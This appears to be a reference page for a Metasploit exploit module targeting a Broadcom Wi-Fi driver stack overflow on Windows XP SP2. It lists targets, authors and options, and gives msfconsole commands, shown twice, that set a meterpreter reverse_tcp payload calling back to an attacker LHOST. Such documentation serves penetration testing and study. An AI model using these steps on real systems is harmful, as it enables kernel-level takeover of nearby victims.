Broadcom Wireless Driver Probe Response SSID Overflow
This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending a 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
Exploit Rank
- Low
Exploit Authors
- Chris Eagle < >
- Johnny Cache < johnnycsh [at] 802.11mercenary.net >
- skape < mmiller [at] hick.org >
- hdm < hdm [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10 (default)
- 1 - Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/driver/broadcom_wifi_ssid
msf exploit(broadcom_wifi_ssid) > show payloads
msf exploit(broadcom_wifi_ssid) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(broadcom_wifi_ssid) > set LHOST [MY IP ADDRESS]
msf exploit(broadcom_wifi_ssid) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/driver/broadcom_wifi_ssid
msf exploit(broadcom_wifi_ssid) > show payloads
msf exploit(broadcom_wifi_ssid) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(broadcom_wifi_ssid) > set LHOST [MY IP ADDRESS]
msf exploit(broadcom_wifi_ssid) > exploit
Exploit Module Options
| ADDR_DST | The MAC address of the target system (default: FF:FF:FF:FF:FF:FF) |
| CHANNEL | The initial channel (default: 11) |
| DRIVER | The name of the wireless driver for lorcon (default: autodetect) |
| INTERFACE | The name of the wireless interface (default: wlan0) |
| RUNTIME | The number of seconds to run the attack (default: 60) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |